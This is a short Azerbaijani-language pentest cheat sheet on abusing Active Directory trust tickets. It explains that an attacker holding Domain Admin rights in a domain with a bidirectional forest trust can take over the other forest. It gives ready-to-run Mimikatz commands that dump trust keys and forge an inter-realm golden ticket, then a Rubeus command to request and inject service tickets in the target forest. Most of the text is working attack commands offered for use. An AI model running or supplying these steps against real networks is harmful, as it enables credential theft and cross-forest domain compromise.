Trust Tickets

Trust Tickets nədir?

"Trust Ticket", Active Directory'dakı güvən əlaqələrini temsil eden bir diğər adlandırmadır. Bu termin, güvən əlaqələri kurulduğunda və əlaqədə istifadə olunan data paketlərini ifadə edir. Trust ticket'lər, fərqlı Active Directory ortamları arasında güvənilir əlaqə kurulmasını təmin edir.

Trust Tickets zəifliyindən istifadə

Başqa bir forest ilə Bidirectional Trust əlaqəsi olan Domendə Domain Admin hüquqlarına sahib olsaq, trust Ticket əldə edə və öz forestlər arası TGT-mizi yarada bilərik.

• Mimikatz dan istifadə edərək:

#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

#Golden ticket hücumundan istifadə edərək domeinlərarası TGT yaradın
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
<PathToSaveTheGoldenTicket>"'

Sonra, inter-realm TGT-dən istifadə edərək istənilən xidmət üçün xarici forest TGS istəyin və resursa daxil olun!

• Rubeus istifadə edərək:

.\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt